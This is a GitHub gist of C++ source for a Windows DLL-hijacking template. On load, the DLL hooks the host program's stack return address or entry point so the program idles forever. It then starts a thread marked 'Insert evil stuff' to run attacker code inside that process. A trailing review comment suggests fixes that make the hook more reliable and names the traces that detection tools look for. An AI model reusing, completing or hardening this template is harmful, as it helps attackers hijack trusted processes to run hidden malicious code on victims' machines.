
@kafkaesqu3
Forked from monoxgas/main.cpp
Created December 18, 2020 16:00

Revisions

  1. @monoxgas monoxgas created this gist Feb 12, 2020.
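--- a/main.cpp
+++ b/main.cpp
@@ -0,0 +1,116 @@
+#include <Windows.h>
+#include <intrin.h>
+#include <string>
+#include <TlHelp32.h>
+#include <psapi.h>
+
+DWORD WINAPI Thread(LPVOID lpParam) {
+// Insert evil stuff
+
+ExitProcess(0);
+return 1;
+}
+
+void DoNothing() {
+while (true) Sleep(10 * 1000);
+}
+
+void InstallHook(PVOID address, PVOID jump) {
+BYTE Jump[12] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 };
+
+DWORD old;
+VirtualProtect(address, sizeof(Jump), 0x40, &old);
+
+RtlCopyMemory(address, Jump, 12);
+RtlCopyMemory(((PBYTE)address + 2), &jump, 8);
+
+VirtualProtect(address, sizeof(Jump), old, &old);
+}
+
+BOOL HookTheStack() {
+
+// Get primary module info
+
+PBYTE baseAddress = NULL;
+DWORD baseSize = 0;
+
+WCHAR fileName[MAX_PATH];
+GetProcessImageFileName((HANDLE)-1, fileName, MAX_PATH);
+std::wstring pathString = std::wstring(fileName);
+
+HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId());
+
+MODULEENTRY32 pEntry;
+pEntry.dwSize = sizeof(pEntry);
+BOOL hRes = Module32Next(hSnapShot, &pEntry);
+while (hRes)
+{
+if (pathString.find(pEntry.szModule) != std::wstring::npos) {
+baseAddress = pEntry.modBaseAddr;
+baseSize = pEntry.modBaseSize;
+break;
+}
+hRes = Module32Next(hSnapShot, &pEntry);
+}
+CloseHandle(hSnapShot);
+
+if (!baseAddress || !baseSize)
+return FALSE;
+
+// Hunt the stack
+
+PBYTE ldrLoadDll = (PBYTE)GetProcAddress(GetModuleHandle(L"ntdll"), "LdrLoadDll");
+PBYTE * stack = (PBYTE *)_AddressOfReturnAddress();
+BOOL foundLoadDll = FALSE;
+
+ULONG_PTR lowLimit, highLimit;
+GetCurrentThreadStackLimits(&lowLimit, &highLimit);
+
+for (; (ULONG_PTR)stack < highLimit; stack++) {
+if (*stack < (PBYTE)0x1000)
+continue;
+
+if (*stack > ldrLoadDll && *stack < ldrLoadDll + 0x1000) {
+// LdrLoadDll is in the stack, let's start looking for our module
+foundLoadDll = TRUE;
+}
+
+if (foundLoadDll && *stack > baseAddress && *stack < (baseAddress + baseSize)) {
+MEMORY_BASIC_INFORMATION mInfo = { 0 };
+VirtualQuery(*stack, &mInfo, sizeof(mInfo));
+
+if (!(mInfo.Protect & PAGE_EXECUTE_READ))
+continue;
+
+// Primary module is in the stack, let's hook there
+InstallHook(*stack, DoNothing);
+
+return TRUE;
+}
+}
+
+// No references found, let's just hook the entry point
+
+PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress;
+PIMAGE_NT_HEADERS32 ntHeader = (PIMAGE_NT_HEADERS32)(baseAddress + dosHeader->e_lfanew);
+PBYTE entryPoint = baseAddress + ntHeader->OptionalHeader.AddressOfEntryPoint;
+
+InstallHook(entryPoint, &DoNothing);
+
+return TRUE;
+}
+
+BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
+{
+
+if (ul_reason_for_call != DLL_PROCESS_ATTACH)
+return TRUE;
+
+if (!HookTheStack())
+return TRUE;
+
+DWORD dwThread;
+HANDLE hThread = CreateThread(NULL, 0, Thread, NULL, 0, &dwThread);
+
+return TRUE;
+}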
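Review bot: The entry-point fallback at `PIMAGE_NT_HEADERS32 ntHeader = (PIMAGE_NT_HEADERS32)(baseAddress + dosHeader->e_lfanew);` reads the image as a 32-bit PE, while the 12-byte stub InstallHook writes (`48 b8 <imm64>` / `ff e0`, i.e. `mov rax, imm64; jmp rax`) is x64-only; it works only because AddressOfEntryPoint sits at the same offset in both optional headers, so use `PIMAGE_NT_HEADERS` there and state the x64-only assumption in a comment above `BYTE Jump[12]`. The page test `if (!(mInfo.Protect & PAGE_EXECUTE_READ))` treats a protection value as a bit flag: PAGE_EXECUTE_READ is 0x20, so a PAGE_EXECUTE_READWRITE (0x40) page fails the test while any value with bit 0x20 set passes; compare the value explicitly, and for the same readability reason replace the bare `0x40` passed to VirtualProtect with `PAGE_EXECUTE_READWRITE`. The handle returned at `HANDLE hThread = CreateThread(NULL, 0, Thread, NULL, 0, &dwThread);` is never closed, and the thread is created from DllMain under the loader lock, which the Thread body (`ExitProcess(0)` followed by an unreachable `return 1;`) depends on being tolerated. For anyone analysing this sample, the observable behaviour is the pair of VirtualProtect calls bracketing a write into an executable page of the main image plus a thread started from DllMain, which image-integrity and memory-tamper checks are built to surface.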